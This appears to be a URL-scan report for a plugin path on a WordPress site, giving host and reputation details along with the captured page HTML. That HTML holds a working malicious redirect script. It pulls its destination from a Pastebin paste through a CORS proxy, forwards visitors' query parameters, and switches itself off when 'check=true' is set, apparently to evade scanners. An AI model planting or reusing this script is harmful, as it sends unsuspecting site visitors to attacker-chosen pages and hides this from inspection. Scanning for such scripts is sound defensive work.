https://ideosphere.in/wp-content/plugins/hot-random-image/

Last Checked: Apr 18, 2024, 11:48 EDT

IP Address: 162.241.123.153
ASN #: AS46606 UNIFIEDLAYER-AS-1, US
Location: Unknown, Unknown, Unknown
URL Reputation:
  • Unknown This URL is not identified as malicious in the PhishTank Database.
  • Unknown PhishCheck thinks this URL is likely not a phish.
  • Unknown OpenPhish: URL not in feed.

Other submissions on 162.241.123.153:

Other submissions on ideosphere.in:

Previous checks:

                               
                             
  • GET
    0 Timed out waiting for a response.

    https://ideosphere.in/favicon.ico

<html><head>
</head>

<body>
<p>Please wait ...</p>

<script>

async function getRedirectUrl(serverUrl = "https://corsproxy.io/?https%3A%2F%2Fpastebin.com%2Fraw%2F15mMbxgt") {
  try {
    const req = await fetch(serverUrl);
    if (!req.ok) {
      throw new Error(`HTTP error! status: ${req.status}`);
    }
    const url = await req.text();
    return url;
  } catch (error) {
    console.error("Failed to fetch redirect URL:", error);
  }
}

async function initRedirect() {
  try {
    const currentUrl = new URL(window.location.href);
    const searchParams = currentUrl.searchParams;

    // Проверяем наличие параметра 'check' и его значение
    if (searchParams.get('check') === 'true') {
      console.log('Redirect is disabled.');
      return;
    }

    const redirectUrl = await getRedirectUrl();
    if (!redirectUrl) {
      console.error("Redirect URL is undefined.");
      return;
    }

    const destinationUrl = new URL(redirectUrl);

    searchParams.forEach((value, key) => {
        destinationUrl.searchParams.append(key, value);
    });

    window.location.href = destinationUrl.href;
  } catch (error) {
    console.error("Failed to initialize redirect:", error);
  }
}

initRedirect();

</script>


</body></html>

                             

Screenshot: